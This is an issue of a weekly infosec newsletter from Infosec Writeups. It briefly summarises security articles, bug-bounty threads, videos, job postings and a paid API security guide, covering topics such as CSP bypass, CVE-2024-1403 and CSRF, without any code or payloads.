👩‍💻IW Weekly #101: CSP Bypass using formaction attribute, 200 hours of hacking to $20K, CVE-2024-1403 analysis, Necessity of DevSecOps, Use of Github Actions to Bypass Microsoft Entra Smart Lockout and many more…

Welcome to the #IWWeekly101 - the Monday newsletter that brings the best in Infosec straight to your inbox.

To help you out, we have 5 Articles, 4 Threads, 3 Videos, 2 Job Alerts and a Special Item 🫢

Read, upskill yourself and spread love to the community 💝

Excited? Let’s jump in 👇

📝 5 Infosec Articles

1. Get insights into bypassing CSP using the formaction attribute with @garethheyes from @portswigger's research team.
2. Gain valuable insights from @mzaherii and @NikoueiMohammad's rewarding journey of spending 200 hours on hardcore bug hunting for a specific target, ultimately netting an impressive $20,000.
3. Take a deep dive into the CVE-2024-1403 realm with @Horizon3ai's team, unraveling the intricacies of the Progress OpenEdge Authentication Bypass.
4. @vishnuprasadk46 underscores the importance of resilience, adaptability, and proactive security measures in their recent blog, emphasizing the necessity for DevSecOps. 
5. Gain practical insights from @dunderhay's  straightforward analysis on leveraging GitHub Actions to bypass Microsoft Entra Smart lockout.

🧵4 Trending Tweets

1. Discover valuable bugs by exploring JavaScript files — they're a treasure trove for hunters. Learn why and how with @0xblackbird insightful guide.
2. Unlock easy critical vulnerabilities by identifying unique attack surfaces. @hacker_ shares a riveting tale of hacking a car company to demonstrate how it's done.
3. Unveiling the pitfalls of directory brute-forcing: @hacker_ warns against filtering by status code alone.
4. Exploring the route: @hacker_ delves into accessing vulnerability reports sent to a $40B+ company, shedding light on crucial security lapses.

📽️ 3 Insightful Videos

1. In his latest video, @Nahamsec cuts through the complexities of Cross-Site Request Forgery (CSRF), offering a succinct yet detailed exploration of the vulnerability.
2. @_JohnHammond dissects the hidden malware risks in PDFs in his latest video, offering crucial insights for cybersecurity awareness.
3. @bsidesahmedabad have released @infosec_au's keynote from their 2023 event, where he delves into a decade of experience hacking on bug bounties.

💼 2 Job Alerts

1. Join the defense! @GitHubSecurity is hiring a Senior Security Analyst for the Threat Intelligence team—exciting remote opportunity in the US. Apply now to be at the forefront of safeguarding the digital realm.
2. Explore exciting career opportunities at @Bugcrowd From Sr. Director of Growth Marketing to Hacker Success Project Manager, discover diverse roles with an awesome leadership team. Join us in shaping the future of cybersecurity.

🎁 1 Special Item

1. This week’s special item deals with an amazing guide into API security from @thebinarybot. Go and grab this opportunity at just $8.

Watch “Understanding Chinese Cyber Threats” by Saikrishna Budamgunta at IWCON2023 and let us know how informative you have found this talk by tagging us on your social media platforms.

That’s all for this week. Hope you enjoyed these incredible finds and learned something new from today’s newsletter. Meet you again next week hacker, until then keep pushing 💪

This newsletter would not have been made possible without our amazing ambassadors.

Resource contribution by: Nikhil A Memane, Hardik Singh, Ayush Singh, Manan, Ansh Patel

Newsletter formatting by: Ayush Singh, Nithin R, Manan, Shlok, Pawan Gambhir, Ansh Patel

Lots of love
Editorial team,
Infosec Writeups